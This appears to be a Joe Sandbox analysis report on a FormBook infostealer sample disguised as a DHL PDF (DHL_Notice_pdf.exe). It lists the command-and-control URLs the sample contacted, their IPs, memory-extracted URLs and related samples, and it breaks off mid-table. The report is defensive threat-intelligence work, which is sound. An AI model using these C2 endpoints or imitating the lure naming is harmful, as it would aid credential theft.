          http://www.bohndigitaltech.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ==0%Avira URL Cloudsafe
          http://www.traindic.top/hpb7/100%Avira URL Cloudmalware
          http://www.kunimi.org/hpb7/I0%Avira URL Cloudsafe
          http://www.creative-shield.com/hpb7/0%Avira URL Cloudsafe
          http://www.madliainsalu.comReferer:0%Avira URL Cloudsafe
          http://www.kotelak.ru0%Avira URL Cloudsafe
          http://www.denko-kosan.com/hpb7/0%Avira URL Cloudsafe
          http://www.0dhy.xyz0%Avira URL Cloudsafe
          http://www.bohndigitaltech.com/hpb7/Xz.0%Avira URL Cloudsafe
          http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X100%Avira URL Cloudmalware
          http://www.kotelak.ru/hpb7/0%Avira URL Cloudsafe
          http://www.amirah.cfdReferer:0%Avira URL Cloudsafe
          http://www.creative-shield.com/hpb7/:0%Avira URL Cloudsafe
          http://www.admet01.club100%Avira URL Cloudmalware
          http://www.rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com/hpb7/j100%Avira URL Cloudmalware
          http://www.bisarropainting.com/hpb7/0%Avira URL Cloudsafe
          http://www.madliainsalu.com0%Avira URL Cloudsafe
          http://www.kotelak.ruReferer:0%Avira URL Cloudsafe
          http://www.denko-kosan.com0%Avira URL Cloudsafe
          http://www.madliainsalu.com/hpb7/0%Avira URL Cloudsafe
          http://www.rifleroofers.com0%Avira URL Cloudsafe
          http://www.buymyenergy.com/hpb7/0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyzReferer:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.comReferer:0%Avira URL Cloudsafe
          http://www.creative-shield.com0%Avira URL Cloudsafe
          http://www.rifleroofers.com/hpb7/0%Avira URL Cloudsafe
          http://www.denko-kosan.comReferer:0%Avira URL Cloudsafe
          http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH10%Avira URL Cloudsafe
          http://www.traindic.top100%Avira URL Cloudmalware
          http://www.creative-shield.comReferer:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com0%Avira URL Cloudsafe
          http://www.yongleproducts.com/hpb7/100%Avira URL Cloudmalware
          http://www.admet01.club/hpb7/100%Avira URL Cloudmalware
          http://www.bisarropainting.comReferer:0%Avira URL Cloudsafe
          http://www.yongleproducts.com0%Avira URL Cloudsafe
          http://www.bisarropainting.com0%Avira URL Cloudsafe
          http://www.denko-kosan.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ==0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyz100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          kunimi.org
          		219.94.129.181
          		truetrueunknown
          bohndigitaltech.com
          		162.241.24.110
          		truetrueunknown
          www.0dhy.xyz
          		198.46.160.97
          		truetrue
            		unknown
            rifleroofers.com
            		67.222.24.48
            		truetrueunknown
            www.yongleproducts.com
            		1.13.186.125
            		truetrue
              		unknown
              www.traindic.top
              		162.0.231.77
              		truetrue
                		unknown
                madliainsalu.com
                		34.120.137.41
                		truefalse
                  		unknown
                  denko-kosan.com
                  		49.212.180.95
                  		truetrue
                    		unknown
                    windowsupdatebg.s.llnwi.net
                    		95.140.230.128
                    		truefalse
                      		unknown
                      www.bohndigitaltech.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.madliainsalu.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.denko-kosan.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.rifleroofers.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.kunimi.org
                              		unknown
                              		unknowntrue
                                		unknown
                                www.amirah.cfd
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.bisarropainting.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.0dhy.xyz/hpb7/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kunimi.org/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.traindic.top/hpb7/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bohndigitaltech.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.bohndigitaltech.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.denko-kosan.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.rifleroofers.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.denko-kosan.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ==true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.kunimi.orgexplorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=146E771M.5.drfalse
                                        		high
                                        http://www.buymyenergy.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mindsetlighting.xyz/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.bohndigitaltech.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsexplorer.exe, 00000004.00000002.517404436.000000001584A000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.0000000004EEA000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.amirah.cfdexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        https://search.yahoo.com?fr=crmas_sfpfcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                          		high
                                          http://www.amirah.cfd/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          http://www.buymyenergy.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bisarropainting.com/hpb7/:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.admet01.clubReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.adoptiveimmunotech.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.madliainsalu.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kunimi.org/hpb7/Iexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.creative-shield.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kotelak.ruexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.0dhy.xyzexplorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bohndigitaltech.com/hpb7/Xz.explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amirah.cfdReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kotelak.ru/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.creative-shield.com/hpb7/:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.admet01.clubexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.adoptiveimmunotech.com/hpb7/jexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.bisarropainting.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icocmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                            		high
                                            http://www.madliainsalu.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kotelak.ruReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.rifleroofers.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.denko-kosan.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.513596661.000000000B74D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.madliainsalu.com/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mindsetlighting.xyzReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.buymyenergy.com/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=146E771M.5.drfalse
                                              		high
                                              http://www.denko-kosan.comReferer:explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                		high
                                                http://www.adoptiveimmunotech.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://nsis.sf.net/NSIS_ErrorErrorDHL_Notice_pdf.exefalse
                                                  		high
                                                  http://www.creative-shield.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                    		high
                                                    http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1explorer.exe, 00000004.00000002.517404436.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.00000000056C4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.adoptiveimmunotech.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.creative-shield.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=146E771M.5.drfalse
                                                      		high
                                                      https://search.yahoo.com?fr=crmas_sfpcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                        		high
                                                        http://www.traindic.topexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.admet01.club/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.yongleproducts.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.bisarropainting.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=146E771M.5.drfalse
                                                          		high
                                                          http://www.bisarropainting.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yongleproducts.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mindsetlighting.xyzexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          198.46.160.97
                                                          		www.0dhy.xyzUnited States
                                                          		36352AS-COLOCROSSINGUStrue
                                                          67.222.24.48
                                                          		rifleroofers.comUnited States
                                                          		63410PRIVATESYSTEMSUStrue
                                                          49.212.180.95
                                                          		denko-kosan.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                          1.13.186.125
                                                          		www.yongleproducts.comChina
                                                          		13335CLOUDFLARENETUStrue
                                                          162.241.24.110
                                                          		bohndigitaltech.comUnited States
                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                          219.94.129.181
                                                          		kunimi.orgJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                          162.0.231.77
                                                          		www.traindic.topCanada
                                                          		22612NAMECHEAP-NETUStrue

                                                          General Information

                                                          Joe Sandbox Version:37.0.0 Beryl
                                                          Analysis ID:831175
                                                          Start date and time:2023-03-21 08:06:06 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 1s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:DHL_Notice_pdf.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@8/5@14/7
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 65.2% (good quality ratio 59.3%)
                                                          • Quality average: 72.2%
                                                          • Quality standard deviation: 31.8%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 131
                                                          • Number of non-executed functions: 66
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240, 209.197.3.8
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          08:07:18API Interceptor467x Sleep call for process: explorer.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          198.46.160.97DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP
                                                          PUqT3VrH7u.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?QxdN=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfepQrAAKAk5Bl2Q==&uuWagI=hHBh
                                                          DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?36Roxu=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&aJ=FMU3rSqU
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?L-0by0i=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEfoBXjiI1K8B0A==&9k93jB=ISG5k3ty
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?gszO=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfepQrAAKAk5Bl2Q==&ASf8=CqpI0h
                                                          gjvkyygg.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?Ns=BrlYCq9+qqzfybZpyiyrhHK2WUaY04/YrdhK4pNzcFj3giICUF3BZQIP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfEZ0dYBaBnaxh1A==&xwND=_V84H
                                                          jkjn.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?YOLhARX=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEfoBXjiI1K8B0A==&mukFGB=ITp1mTOl9b
                                                          njsd.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?syhgSw=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&UVr=hFKKHFRtW
                                                          gdxb.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?PSrwg=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&ueg=97gkFFS1z
                                                          roure.exeGet hashmaliciousFormBookBrowse
                                                          • www.0dhy.xyz/hpb7/?7Dm=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfepQrAAKAk5Bl2Q==&qfcU=O_tcT2
                                                          67.222.24.48DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP
                                                          PUqT3VrH7u.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?QxdN=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCsDhv1mB7/0XFtg==&uuWagI=hHBh
                                                          DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?36Roxu=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&aJ=FMU3rSqU
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?L-0by0i=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV21ZFiFpzuHqhvw==&9k93jB=ISG5k3ty
                                                          bart.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • www.rifleroofers.com/08da/
                                                          hI7ey7jFag.exeGet hashmaliciousFormBookBrowse
